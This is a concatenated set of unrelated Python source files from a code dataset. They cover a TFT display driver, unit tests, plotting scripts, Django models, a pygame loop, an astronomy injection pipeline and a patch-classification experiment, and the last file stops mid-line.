+{"seq_id":"568575300","text":"\"\"\"\nclass DisplayTFT based upon TFT-display\n\nAdafruit: To make new bitmaps, make sure they are less\nthan 240 by 320 pixels and save them in 24-bit BMP format!\n\n2020-0516 PP TODO: add adafruit_gfx for drawing graphics\n2020-0516 PP new/basic, based upon tftbmp.py\n\"\"\"\nimport time\nimport math\nfrom machine import SPI, Pin\n# LoPy4 board specifications\nimport lopy4board as board\n# TFT ST7735 type of TFT-display\nfrom ST7735 import TFT, TFTColor\n# from sysfont import sysfont\n# Lelijk font: from seriffont import seriffont as sysfont\nfrom terminalfont import terminalfont as sysfont\n\n# TFT-display configuration\n# TFT_DC, TFT_RST, TFT_CS, TFT_BLK, TFT_SPEED\nfrom examples.displays.config_tft import *\n\nUSE_DEBUG = False\n\n\nclass DisplayTFT():\n\n def __init__(self, spi,\n dc_pin=TFT_DC, rst_pin=TFT_RST,\n cs_pin=TFT_CS, blk_pin=TFT_BLK):\n self._tft = TFT(spi, dc_pin, rst_pin, cs_pin)\n self._blkPin = blk_pin\n self._dcPin = dc_pin # ?: necessary?\n self._rstPin = rst_pin # ?: necessary?\n self._csPin = cs_pin # ?: necessary?\n self.init()\n\n def init(self):\n # DEBUG: print(\"DisplayTFT::init() entered...\")\n self._tft.initr()\n # alternative: self._tft.initb2()\n self._tft.rgb(True)\n\n # Backlight on or off\n def displayOn(self, isOnOff=True):\n self._blkPin.value(1 if isOnOff else 0)\n\n # erase TFT-display\n def blank(self):\n self._tft.fill(TFT.BLACK)\n\n def rotation(self, orient=0):\n assert (orient >= 0 and orient <= 4)\n self._tft.rotation(orient)\n\n def printPins(self):\n dcPin, rstPin, csPin, blkPin = self.pins\n print(\"DC={0}\\nRST={1}\\nCS={2}\\nBLK={3}\".format(\n dcPin, rstPin, csPin, blkPin)\n )\n\n @property\n def pins(self):\n return (\n self._dcPin,\n self._rstPin,\n self._csPin,\n self._blkPin,\n )\n\n # display BMP-image on display\n def displayBMP(self, filename, orient=0, font=sysfont):\n tft = self._tft\n if USE_DEBUG:\n print(\"File: {}\".format(filename), end=\", \")\n tft.rotation(orient) # PP added\n with open(filename, 'rb') as f:\n if f.read(2) == b'BM': # header\n dummy = f.read(8) # file size(4), creator bytes(4)\n offset = int.from_bytes(f.read(4), 'little')\n hdrsize = int.from_bytes(f.read(4), 'little')\n width = int.from_bytes(f.read(4), 'little')\n height = int.from_bytes(f.read(4), 'little')\n if int.from_bytes(f.read(2), 
'little') == 1: # planes must be 1\n depth = int.from_bytes(f.read(2), 'little')\n if depth == 24 and int.from_bytes(f.read(4), 'little') == 0:#compress method == uncompressed\n if USE_DEBUG:\n print(\"image size:\", width, \"x\", height)\n rowsize = (width * 3 + 3) & ~3\n if height < 0:\n height = -height\n flip = False\n else:\n flip = True\n w, h = width, height\n if w > 128: w = 128\n if h > 160: h = 160\n tft._setwindowloc((0,0),(w - 1,h - 1))\n for row in range(h):\n if flip:\n pos = offset + (height - 1 - row) * rowsize\n else:\n pos = offset + row * rowsize\n if f.tell() != pos:\n dummy = f.seek(pos)\n for col in range(w):\n bgr = f.read(3)\n tft._pushcolor(TFTColor(bgr[2],bgr[1],bgr[0]))\n fname = filename.split(\"/\")\n tft.text((10, h-font[\"Height\"]-3),\n fname[1][:-4].upper(), TFT.YELLOW, font, 1,\n nowrap=True)\n\n # display text on screenpostion x,y in color and font\n def text(self, message, x, y, color=TFT.YELLOW, size=1, font=sysfont):\n self._tft.text((x, y), message,\n color, font, size,\n nowrap=True\n )\n\n\nif __name__ == '__main__':\n from machine import SPI\n # from machine import Pin\n # LoPy4 board specifications\n import lopy4board as board\n try:\n # create SPI-object\n spi = SPI(0, mode=SPI.MASTER, baudrate=TFT_SPEED) # defaults\n # __init__( self, spi, aDC, aReset, aCS)\n\n # TFT_DC = Pin('P22') # Pin.exp_board.G9\n # TFT_RST = Pin('P23') # Pin.exp_board.G10\n # TFT_CS = Pin('P12') # Pin.exp_board.G28\n # TFT_BLK = Pin('P21') # Pin.exp_board.G8\n # different Pins: display = DisplayTFT(spi, TFT_DC, TFT_RST, TFT_CS, TFT_BLK)\n display = DisplayTFT(spi) # use my default lopy4-pins\n display.displayOn()\n print(display.pins) # print my used default Pins for display\n # # Backlight on or off\n # display.displayOn(isOnOff=True)\n path = \"images/\"\n display.displayBMP(filename=path + 'woman.bmp')\n\n except OSError:\n print(\"File problem.\")\n\n except KeyboardInterrupt:\n print(\"User interrupt.\")\n # finally:\n # spi.deinit()\n # print(\"Done.\")\n","sub_path":"workshops/sample-code/examples/display/displaytft.py","file_name":"displaytft.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"259727463","text":"from tests.base_test import BaseTest\nfrom page_objects.search_results_page import SearchResultsPage\nfrom page_objects.product_details_page import ProductDetailsPage\n\n\nclass AllegroUnitTests(BaseTest, SearchResultsPage, ProductDetailsPage):\n\n def test_search_by_text(self):\n self.mainPage.search_by_name('iphone')\n self.assertTrue(self.is_product_on_list())\n\n def test_product_details_page(self):\n self.mainPage.search_by_name('iphone')\n self.mainPage.product_click()\n self.assertTrue(self.is_product_details_present())\n\n def test_going_to_next_page(self):\n self.mainPage.search_by_name('iphone')\n self.mainPage.going_to_next_page_check()\n self.assertTrue(self.is_page_num_2())\n\n\n\n\n # def test_next_page(self):\n # # testing next page\n # MainPage.search_by_name(self)\n # MainPage.going_to_next_page_check()\n # self.assertEqual(int(page_num2), 2)\n","sub_path":"tests/main_page_tests.py","file_name":"main_page_tests.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158431439","text":"# coding=utf-8\nimport jieba\nimport matplotlib.pyplot as plt\nimport wordcloud\n\ndef word_cloudclass():\n #输入文件地址\n result = 
open('../data/procedure.txt',encoding=\"UTF-8\").read()\n my_cloud = wordcloud.WordCloud().generate(result)\n image = wordcloud.WordCloud(background_color='yellow',height=10,width=10,margin=90)\n plt.imshow(my_cloud)\n plt.axis(\"off\")\n plt.show()\n\nif __name__ == \"__main__\":\n word_cloudclass()\n\n\n","sub_path":"文本展示图/word_cloud.py","file_name":"word_cloud.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"415351136","text":"import matplotlib.pylab as plt\nimport numpy as np\nimport pandas as pd\nindex=pd.date_range('20200201','20200215')\ndata=[3,6,7,4,2,1,3,8,9,10,12,15,13,22,14]\n\nnp.random.seed(2)\ndata=np.random.randint(20,size=len(index))\nser_data=pd.Series(data,index=index)\nplt.figure(figsize=(15, 5))\nser_data.plot(style='r--')\nser_data.rolling(3).mean().plot(style='b')\n\n","sub_path":"Python数据分析从入门到精通/MR/Code/04/55/demo 扩展.py","file_name":"demo 扩展.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"107047463","text":"\"\"\"\nProvides the list of scripts known to the CEA - to be used by interfaces built on top of the CEA.\n\"\"\"\nfrom __future__ import print_function\n\nimport os\nimport cea\nimport cea.inputlocator\n\nSCRIPTS_PICKLE = os.path.abspath(os.path.join(os.path.dirname(cea.__file__), 'scripts.pickle'))\nSCRIPTS_YML = os.path.abspath(os.path.join(os.path.dirname(cea.__file__), 'scripts.yml'))\n\n\nclass CeaScript(object):\n def __init__(self, script_dict, category):\n self.name = script_dict['name']\n self.module = script_dict['module']\n self.description = script_dict.get('description', '')\n self.interfaces = script_dict.get('interfaces', ['cli'])\n self.label = script_dict.get('label', self.name)\n self.category = category\n self.parameters = script_dict.get('parameters', [])\n self.input_files = script_dict.get('input-files', [])\n\n def __repr__(self):\n return '' % self.name\n\n def print_script_configuration(self, config, verb='Running'):\n \"\"\"\n Print a list of script parameters being used for this run of the tool. 
Historically, each tool\n was responsible for printing their own parameters, but that requires manually keeping track of these\n parameters.\n \"\"\"\n print('City Energy Analyst version %s' % cea.__version__)\n script_name = self.name\n print(\"%(verb)s `cea %(script_name)s` with the following parameters:\" % locals())\n for section, parameter in config.matching_parameters(self.parameters):\n section_name = section.name\n parameter_name = parameter.name\n parameter_value = parameter.get()\n print(\"- %(section_name)s:%(parameter_name)s = %(parameter_value)s\" % locals())\n print(\" (default: %s)\" % parameter.default)\n\n def print_missing_input_files(self, config):\n schema_data = schemas()\n print()\n print(\"---------------------------\")\n print(\"ERROR: Missing input files:\")\n for method_name, path in self.missing_input_files(config):\n script_suggestions = (schema_data[method_name]['created_by']\n if 'created_by' in schema_data[method_name]\n else None)\n print('- {path}'.format(path=path))\n if script_suggestions:\n print(' (HINT: try running {scripts})'.format(path=path, scripts=', '.join(script_suggestions)))\n\n def missing_input_files(self, config):\n \"\"\"\n Return a list of bound :py:class:`cea.inputlocator.InputLocator` method names, one for each file required as\n input for this script that is not present yet as well as the applied path searched for.\n :return: Sequence[str]\n \"\"\"\n # get a locator without triggering the restricted to\n restricted_to = config.restricted_to\n config.restricted_to = None\n locator = cea.inputlocator.InputLocator(config.scenario)\n config.restricted_to = restricted_to\n\n for locator_spec in self.input_files:\n method_name, args = locator_spec[0], locator_spec[1:]\n method = getattr(locator, method_name)\n path = method(*self._lookup_args(config, locator, args))\n if not os.path.exists(path):\n yield [method_name, path]\n\n def _lookup_args(self, config, locator, args):\n \"\"\"returns a list of arguments to a locator method\"\"\"\n result = []\n for arg in args:\n if arg == 'building_name':\n result.append(locator.get_zone_building_names()[0])\n else:\n # expect an fqname for the config object\n result.append(config.get(arg))\n return result\n\n\ndef _get_categories_dict():\n \"\"\"Load the categories -> [script] mapping either from the YAML file or, in the case of dashboard,\n which don't support YAML, load from a pickled version generated on the call to ``cea install-toolbox``.\"\"\"\n try:\n import yaml\n from cea.utilities.yaml_ordered_dict import OrderedDictYAMLLoader\n categories = yaml.load(open(SCRIPTS_YML), OrderedDictYAMLLoader)\n except ImportError:\n import pickle\n categories = pickle.load(open(SCRIPTS_PICKLE))\n return categories\n\n\ndef list_scripts():\n \"\"\"List all scripts\"\"\"\n categories = _get_categories_dict()\n for category in categories.keys():\n for script_dict in categories[category]:\n yield CeaScript(script_dict, category)\n\n\ndef by_name(script_name):\n for script in list_scripts():\n # Convert script names that use \"_\" instead of \"-\"\n if script.name == script_name.replace(\"_\", \"-\"):\n return script\n raise cea.ScriptNotFoundException('Invalid script name: %s' % script_name)\n\n\ndef for_interface(interface='cli'):\n \"\"\"Return the list of CeaScript instances that are listed for the interface\"\"\"\n return [script for script in list_scripts() if interface in script.interfaces]\n\n\ndef schemas():\n \"\"\"Return the contents of the schemas.yml file\"\"\"\n import yaml\n schemas_yml = 
os.path.join(os.path.dirname(__file__), 'schemas.yml')\n return yaml.load(open(schemas_yml), Loader=yaml.CLoader)\n\n\ndef get_schema_variables(schema):\n \"\"\"\n This method returns a set of all variables within the schemas.yml. The set is organised by:\n (variable_name, locator_method, script, file_name:sheet_name)\n If the variable is from an input database, the script is replaced by \"-\"\n Also, if the variable is not from a tree data shape (such as xlsx or xls), the 'file_name:sheet_name' becomes 'file_name' only.\n The sheet_name is important to consider as a primary key for each variable can only be made through combining the 'file_name:sheet_name' and\n 'variable_name'. Along with the locator_method, the set should contain all information necessary for most tasks.\n \"\"\"\n\n schema_variables = set()\n for locator_method in schema:\n\n # if there is no script mapped to 'created_by', it must be an input_file\n # replace non-existent script with the name of the file without the extension\n if not schema[locator_method]['created_by']:\n script = \"-\"\n else:\n script = schema[locator_method]['created_by'][0]\n\n if not \"schema\" in schema[locator_method] or not schema[locator_method][\"schema\"]:\n print(\"Could not find schema for {locator_method}\".format(locator_method=locator_method))\n continue\n\n # for repetitive variables, include only one instance\n for variable in schema[locator_method]['schema']:\n if variable.find('srf') != -1:\n variable = variable.replace(variable, 'srf0')\n if variable.find('PIPE') != -1:\n variable = variable.replace(variable, 'PIPE0')\n if variable.find('NODE') != -1:\n variable = variable.replace(variable, 'NODE0')\n if variable.find('B0') != -1:\n variable = variable.replace(variable, 'B001')\n\n # if the variable is one associated with an epw file: exclude for now\n if schema[locator_method]['file_type'] == 'epw':\n variable = 'EPW file variables'\n\n # if the variable is actually a sheet name due to tree data shape\n if schema[locator_method]['file_type'] in {'xlsx', 'xls'}:\n worksheet = variable\n for variable_in_sheet in schema[locator_method]['schema'][worksheet]:\n file_name = \"{file_path}:{worksheet}\".format(file_path=schema[locator_method]['file_path'],\n worksheet=worksheet)\n schema_variables.add((variable_in_sheet, locator_method, script, file_name))\n # otherwise create the meta set\n else:\n\n file_name = schema[locator_method]['file_path']\n schema_variables.add((variable, locator_method, script, file_name))\n return schema_variables\n\n\ndef get_schema_scripts(schema):\n schema_scripts = set()\n for locator_method in schema:\n if len(schema[locator_method]['used_by']) > 0:\n for script in schema[locator_method]['used_by']:\n schema_scripts.add(script)\n if len(schema[locator_method]['created_by']) > 0:\n for script in schema[locator_method]['created_by']:\n schema_scripts.add(script)\n return schema_scripts","sub_path":"cea/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"265657196","text":"from __future__ import unicode_literals\n\nfrom django.db import models\n\n\n# Create your models here.\nclass Client(models.Model):\n name = models.CharField(max_length=20)\n\n def __str__(self):\n return self.name\n\n\nclass Equipement(models.Model):\n iPAddress = models.CharField(max_length=20)\n hostname = models.CharField(max_length=30)\n constructeur = models.CharField(max_length=20)\n clientID = 
models.ForeignKey(Client)\n\n\nclass ConfigurationGenerate(models.Model):\n configurationText = models.TextField()\n equipementId = models.ForeignKey(Equipement)\n date = models.DateTimeField()\n\n\nclass ConfiguationSendRequest(models.Model):\n ERROR = \"ERROR\"\n SUCCESS = \"SUCCESS\"\n IN_PROGRESS = \"IN PROGRESS\"\n STATUS_CHOICES = (\n (ERROR, 'Error'),\n (SUCCESS, 'Success'),\n (IN_PROGRESS, 'In Progress')\n )\n configurationText = models.TextField()\n addressIP = models.CharField(max_length=20)\n startTime = models.DateTimeField(null=True, blank=True)\n endTime = models.DateTimeField(null=True, blank=True)\n returnEquipment = models.TextField(null=True, blank=True)\n status = models.CharField(max_length=20, choices=STATUS_CHOICES, default=\"In Progress\")\n statusData = models.TextField(null=True, blank=True)\n\n def __str__(self):\n return \"%s: %s, %s\" % (self.id, self.addressIP, self.configurationText[:10])\n\n def jsonObject(self):\n pass\n\n\n\n","sub_path":"WebConf/WebConf/GenConf/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567085996","text":"import os\nimport subprocess\n\nimport click\nimport numpy as np\n\nimport fitsio\nimport esutil.numpy_util\nimport sep\n\nfrom lsst.daf.persistence import Butler\nfrom sxdes import run_sep\nfrom ssi_tools.layout_utils import make_hexgrid_for_tract\nfrom fsi_tools.matching import do_balrogesque_matching\nfrom desc_dc2_dm_data import REPOS\n\nsep.set_extract_pixstack(1_000_000)\n\n# this list is hard coded - the gen 2 butler doesn't have a method for introspection\nDC2_TRACTS = set(\n [\n 2723, 2730, 2897, 2904, 3076, 3083, 3259, 3266, 3445, 3452, 3635, 3642, 3830,\n 3837, 4028, 4035, 4230, 4428, 4435, 4636, 4643, 4851, 4858, 5069, 2724, 2731,\n 2898, 2905, 3077, 3084, 3260, 3267, 3446, 3453, 3636, 3643, 3831, 4022, 4029,\n 4224, 4231, 4429, 4436, 4637, 4644, 4852, 4859, 5070, 2725, 2732, 2899, 2906,\n 3078, 3085, 3261, 3268, 3447, 3454, 3637, 3825, 3832, 4023, 4030, 4225, 4232,\n 4430, 4437, 4638, 4645, 4853, 4860, 5071, 2726, 2733, 2900, 2907, 3079, 3086,\n 3262, 3441, 3448, 3631, 3638, 3826, 3833, 4024, 4031, 4226, 4233, 4431, 4438,\n 4639, 4646, 4854, 5065, 5072, 3451, 2727, 2734, 2901, 2908, 3080, 3256, 3263,\n 3442, 3449, 3632, 3639, 3827, 3834, 4025, 4032, 4227, 4234, 4432, 4439, 4640,\n 4647, 4855, 5066, 5073, 2728, 2735, 2902, 3074, 3081, 3257, 3264, 3443, 3450,\n 3633, 3640, 3828, 3835, 4026, 4033, 4228, 4235, 4433, 4440, 4641, 4648, 4856,\n 5067, 5074, 2729, 2896, 2903, 3075, 3082, 3258, 3265, 3444, 3634, 3641, 3829,\n 3836, 4027, 4034, 4229, 4236, 4434, 4441, 4642, 4850, 4857, 5068,\n ]\n)\n\n# DC2 truth catalog to use as injected sources\nDC2_TRUTH_CAT = (\n \"/global/cfs/cdirs/lsst/groups/fake-source-injection/DC2/catalogs/\"\n \"cosmoDC2_v1.1.4_small_fsi_catalog.fits\"\n)\n\nOUTPUT_BUTLER = os.path.expandvars(os.path.join(\"$SCRATCH\", \"butler_coadd_sep\"))\nOUTPUT_DIR = \"ssi_cats\"\n\n\ndef _run_sep_and_add_radec(ti, img, zp, err=None, minerr=None):\n if err is None:\n err = np.sqrt(img.variance.array.copy())\n img = img.image.array.copy()\n\n if minerr is not None:\n msk = err < minerr\n err[msk] = minerr\n\n cat, seg = run_sep(\n img,\n err,\n )\n cat = esutil.numpy_util.add_fields(\n cat,\n [(\"ra\", \"f8\"), (\"dec\", \"f8\"), (\"mag_auto\", \"f8\")]\n )\n wcs = ti.getWcs()\n cat[\"ra\"], cat[\"dec\"] = wcs.pixelToSkyArray(cat[\"x\"], cat[\"y\"], degrees=True)\n cat[\"mag_auto\"] = 
zp - 2.5*np.log10(cat[\"flux_auto\"])\n return cat, seg\n\n\n@click.command()\n@click.option(\n '--tract', type=int, default=None, help='the tract to process', required=True\n)\n@click.option(\n '--patch', type=int, default=None, help='the patch to process', required=True\n)\n@click.option('--seed', type=int, default=None, help='seed for the RNG', required=True)\ndef main(tract, patch, seed):\n \"\"\"Run SSI on a DC2 tract and patch\"\"\"\n # first we need to extract the tract and patch from the butler in order to\n # setup the source catalog\n butler = Butler(REPOS[\"2.2i_dr6_wfd\"])\n skymap = butler.get(\"deepCoadd_skyMap\")\n\n if tract not in DC2_TRACTS:\n raise RuntimeError(\"Tract %d is not valid for DC2!\" % tract)\n\n ti = skymap[tract]\n\n if patch < 0 or patch >= len(ti):\n raise RuntimeError(\n \"patch %d is not valid for tract %d (has only %d patches)!\" % (\n patch, tract, len(tract)\n )\n )\n\n # now we are making the truth catalog\n # - we cut to things brighter than mag 25 to avoid injecting gobs of faint things\n # - we cut the injection catalog to the patch bounaries in order to avoid drawing\n # extra stuff\n # - we have to write the tract sources to disk for the stack task\n grid = make_hexgrid_for_tract(ti, rng=seed)\n srcs = fitsio.read(DC2_TRUTH_CAT)\n\n msk = srcs[\"rmagVar\"] <= 25\n srcs = srcs[msk]\n\n rng = np.random.RandomState(seed=seed)\n inds = rng.choice(len(srcs), size=len(grid), replace=True)\n tract_sources = srcs[inds].copy()\n tract_sources[\"raJ2000\"] = np.deg2rad(grid[\"ra\"])\n tract_sources[\"decJ2000\"] = np.deg2rad(grid[\"dec\"])\n\n pi = ti[patch]\n msk = pi.getOuterBBox().contains(grid[\"x\"], grid[\"y\"])\n tract_sources = tract_sources[msk]\n\n subprocess.run(\"mkdir -p \" + OUTPUT_DIR, shell=True, check=True)\n\n ssi_src_file = os.path.join(\n OUTPUT_DIR, \"ssi_input_tract%d_patch%d.fits\" % (tract, patch)\n )\n fitsio.write(\n ssi_src_file,\n tract_sources,\n clobber=True,\n )\n\n # now we need to run the SSI\n # for this we need to define an output butler area\n subprocess.run(\"mkdir -p \" + OUTPUT_BUTLER, shell=True, check=True)\n cmd = \"\"\"\\\ninsertFakes.py \\\n/global/cfs/cdirs/lsst/production/DC2_ImSim/Run2.2i/desc_dm_drp/v19.0.0-v1\\\n/rerun/run2.2i-coadd-wfd-dr6-v1 \\\n--output %s/ \\\n--id tract=%d patch=%s \\\nfilter=r -c fakeType=%s \\\n--clobber-config --no-versions\n\"\"\" % (OUTPUT_BUTLER, tract, \"%d,%d\" % pi.getIndex(), ssi_src_file)\n subprocess.run(cmd, shell=True, check=True)\n\n # from here we have images with the sources on disk\n # we are going to read them back in, make a few catalogs, and output the data\n output_butler = Butler(OUTPUT_BUTLER)\n bbox = pi.getOuterBBox()\n coaddId = {\n 'tract': ti.getId(),\n 'patch': \"%d,%d\" % pi.getIndex(),\n 'filter': 'r'\n }\n\n image = output_butler.get(\n \"deepCoadd_sub\", bbox=bbox, immediate=True, dataId=coaddId\n )\n fake_image = output_butler.get(\n \"fakes_deepCoadd_sub\", bbox=bbox, immediate=True, dataId=coaddId\n )\n zp = 2.5*np.log10(image.getPhotoCalib().getInstFluxAtZeroMagnitude())\n\n orig_det_cat, orig_det_seg = _run_sep_and_add_radec(ti, image, zp)\n ssi_det_cat, ssi_det_seg = _run_sep_and_add_radec(ti, fake_image, zp)\n ssi_truth_cat, ssi_truth_seg = _run_sep_and_add_radec(\n ti,\n (fake_image.image.array - image.image.array).copy(),\n zp,\n np.zeros_like(np.sqrt(fake_image.variance.array.copy())),\n minerr=np.mean(np.sqrt(fake_image.variance.array.copy())),\n )\n\n match_flag, match_index = do_balrogesque_matching(\n ssi_det_cat, orig_det_cat, 
ssi_truth_cat, \"flux_auto\",\n )\n\n ssi_det_cat = esutil.numpy_util.add_fields(\n ssi_det_cat,\n [(\"match_flag\", \"i4\"), (\"match_index\", \"i8\")]\n )\n ssi_det_cat[\"match_flag\"] = match_flag\n ssi_det_cat[\"match_index\"] = match_index\n\n output_fname = \"ssi_data_tract%d_patch%d.fits\" % (tract, patch)\n with fitsio.FITS(\n os.path.join(OUTPUT_DIR, output_fname), \"rw\", clobber=True\n ) as fits:\n fits.write(orig_det_cat, extname=\"orig_cat\")\n fits.write(ssi_det_cat, extname=\"ssi_cat\")\n fits.write(ssi_truth_cat, extname=\"truth_cat\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2020_07_16_coadd_sep/process_tract_patch.py","file_name":"process_tract_patch.py","file_ext":"py","file_size_in_byte":6766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400211855","text":"import sys\nimport os.path\nfrom xsl_stat.collector import Collector\nfrom pymongo import MongoClient\n\n\ndef error(msg):\n print(msg)\n sys.exit(1)\n\n\ntry:\n interfaces_dir = sys.argv[1]\n\n if not os.path.exists(interfaces_dir):\n error(f\"File {interfaces_dir} doesn't exist\")\n\n client = MongoClient()\n db = client['stat']\n\n collector = Collector(interfaces_dir, db)\n collector.collect()\n\nexcept IndexError:\n error(f\"Usage: python3 {os.path.basename(sys.argv[0])} interfaces_dir\")\n","sub_path":"console/collect.py","file_name":"collect.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"419688868","text":"#pygame library\nimport pygame\n#pygame init for using pygame library\npygame.init()\n\n#Screen properties\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 800\nSCREEN_TITLE = \"Crossy RPG Game\"\n#ScreenColor as RGB codes\nWHITE_COLOR = (255,255,255)\nBLACK_COLOR = (0,0,0)\n#For fps \nclock= pygame.time.Clock()\nTICK_RATE = 144\nis_Game_Over = False\n\n#Create window with specified sizes\ngame_screen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\n#Set window color to white\ngame_screen.fill(WHITE_COLOR)\n#Set window title\npygame.display.set_caption(SCREEN_TITLE)\n#main loop to keep game running and screen updates\nwhile not is_Game_Over:\n\n #loot to get all event happening in screen\n for event in pygame.event.get():\n\n #For printing events\n #print(event)\n\n #if we have a quit type event then exit the game loop\n if event.type == pygame.QUIT:\n is_Game_Over = True\n #update all game graphics\n pygame.display.update()\n #tick the clock to update everythig within the game\n clock.tick(TICK_RATE)\n\n\n#Quit pygame and the program\npygame.quit()\nquit()\n","sub_path":"rpgGamePy.py","file_name":"rpgGamePy.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442493356","text":"import experiment.config as config\nimport os\nfrom representation.word2vec import Word2vector\nimport pickle\nfrom scipy.spatial import distance\nfrom sklearn.metrics import roc_curve, auc, accuracy_score, recall_score, precision_score\nfrom sklearn.metrics import confusion_matrix, average_precision_score\nimport numpy as np\nimport experiment.ML4Prediciton as ML4Prediciton\nimport signal\nimport json\nimport random\nimport math\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport data\n\nclass Experiment:\n def __init__(self):\n self.cf = config.Config()\n self.path_patch = self.cf.path_patch\n if not 'Unique' in self.path_patch:\n raise ('please deduplicate 
it!')\n self.path_patch_sliced = self.cf.path_patch + '_sliced'\n # self.dict_b = {}\n self.bugReportText = None\n def evaluation_metrics(self, y_trues, y_pred_probs):\n fpr, tpr, thresholds = roc_curve(y_true=y_trues, y_score=y_pred_probs, pos_label=1)\n auc_ = auc(fpr, tpr)\n\n y_preds = [1 if p >= 0.5 else 0 for p in y_pred_probs]\n\n acc = accuracy_score(y_true=y_trues, y_pred=y_preds)\n prc = precision_score(y_true=y_trues, y_pred=y_preds)\n rc = recall_score(y_true=y_trues, y_pred=y_preds)\n f1 = 2 * prc * rc / (prc + rc)\n\n print('\\n***------------***')\n print('Evaluating AUC, F1, +Recall, -Recall')\n print('Test data size: {}, Incorrect: {}, Correct: {}'.format(len(y_trues), y_trues.count(0), y_trues.count(1)))\n print('Accuracy: %f -- Precision: %f -- +Recall: %f -- F1: %f ' % (acc, prc, rc, f1))\n tn, fp, fn, tp = confusion_matrix(y_trues, y_preds).ravel()\n recall_p = tp / (tp + fn)\n recall_n = tn / (tn + fp)\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: {:.3f}'.format(auc_, recall_p, recall_n))\n # return , auc_\n\n # print('AP: {}'.format(average_precision_score(y_trues, y_pred_probs)))\n return recall_p, recall_n, acc, prc, rc, f1, auc_\n\n def save_bugreport_deprecated(self, project, embedding_method):\n file_name = '../data/bugreport_dict_'+embedding_method+'.pickle'\n if os.path.exists(file_name):\n return\n w = Word2vector(embedding_method)\n dict_b = {}\n path = '../preprocess/' + project + '_bugreport.txt'\n with open(path, 'r+') as f:\n for line in f:\n project_id = line.split(',')[0]\n bugReport = line.split(',')[1]\n learned_vector = w.embedding(bugReport)\n dict_b[project_id] = learned_vector\n pickle.dump(dict_b, open(file_name, 'wb'))\n\n def save_bugreport(self,):\n file_name = '../data/bugreport_dict.pickle'\n if os.path.exists(file_name):\n return\n # w = Word2vector(embedding_method)\n dict_b = {}\n path = 'data/BugReport'\n files = os.listdir(path)\n for file in files:\n if not file.endswith('bugreport.txt'):\n continue\n path_bugreport = os.path.join(path, file)\n with open(path_bugreport, 'r+') as f:\n for line in f:\n project_id = line.split('$$')[0]\n bugReportSummary = line.split('$$')[1].strip('\\n')\n bugReportDescription = line.split('$$')[2].strip('\\n')\n dict_b[project_id] = [bugReportSummary, bugReportDescription]\n pickle.dump(dict_b, open(file_name, 'wb'))\n\n\n def predict_10fold(self, embedding_method, algorithm):\n dataset = pickle.load(open('../data/bugreport_patch_'+embedding_method+'.pickle', 'rb'))\n bugreport_vector = np.array(dataset[0]).reshape((len(dataset[0]),-1))\n commit_vector = np.array(dataset[1]).reshape((len(dataset[1]),-1))\n labels = np.array(dataset[2])\n\n # combine bug report and commit message of patch\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n cl = ML4Prediciton.Classifier(features, labels, algorithm, 10)\n cl.cross_validation()\n\n def predict_leave1out(self, embedding_method, times, algorithm):\n dataset_json = pickle.load(open('../data/bugreport_patch_json_' + embedding_method + '.pickle', 'rb'))\n # leave one out\n project_ids = list(dataset_json.keys())\n number = len(project_ids)\n accs, prcs, rcs, f1s, aucs = list(), list(), list(), list(), list()\n rcs_p, rcs_n = list(), list()\n for i in range(times):\n random.shuffle(project_ids)\n train_ids = project_ids[:int(0.9*number)]\n test_ids = project_ids[int(0.9*number):]\n\n train_features, train_labels = [], []\n for train_id in train_ids:\n value = dataset_json[train_id]\n bugreport_vector = value[0]\n for m in range(1, 
len(value)):\n commit_vector, label = value[m][0], value[m][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n\n train_features.append(features[0])\n train_labels.append(label)\n train_features = np.array(train_features)\n\n test_features, test_labels = [], []\n for test_id in test_ids:\n value = dataset_json[test_id]\n bugreport_vector = value[0]\n for n in range(1, len(value)):\n commit_vector, label = value[n][0], value[n][1]\n features = np.concatenate((bugreport_vector, commit_vector), axis=1)\n\n test_features.append(features[0])\n test_labels.append(label)\n test_features = np.array(test_features)\n # dataset = np.concatenate((train_features, test_features), axis=0)\n labels = train_labels+test_labels\n\n if i == 0:\n print('All data size: {}, Incorrect: {}, Correct: {}'.format(len(labels), labels.count(0),\n labels.count(1)))\n print('Algorithm: {}'.format(algorithm))\n print('#####')\n\n cl = ML4Prediciton.Classifier(None, None, algorithm, None, train_features, train_labels, test_features, test_labels)\n auc_, recall_p, recall_n, acc, prc, rc, f1 = cl.leave1out_validation()\n accs.append(acc)\n prcs.append(prc)\n rcs.append(rc)\n f1s.append(f1)\n\n aucs.append(auc_)\n rcs_p.append(recall_p)\n rcs_n.append(recall_n)\n\n print('')\n print('{} leave one out mean: '.format('10-90'))\n print('Accuracy: {:.1f} -- Precision: {:.1f} -- +Recall: {:.1f} -- F1: {:.1f} -- AUC: {:.3f}'.format(\n np.array(accs).mean() * 100, np.array(prcs).mean() * 100, np.array(rcs).mean() * 100,\n np.array(f1s).mean() * 100, np.array(aucs).mean()))\n print('AUC: {:.3f}, +Recall: {:.3f}, -Recall: 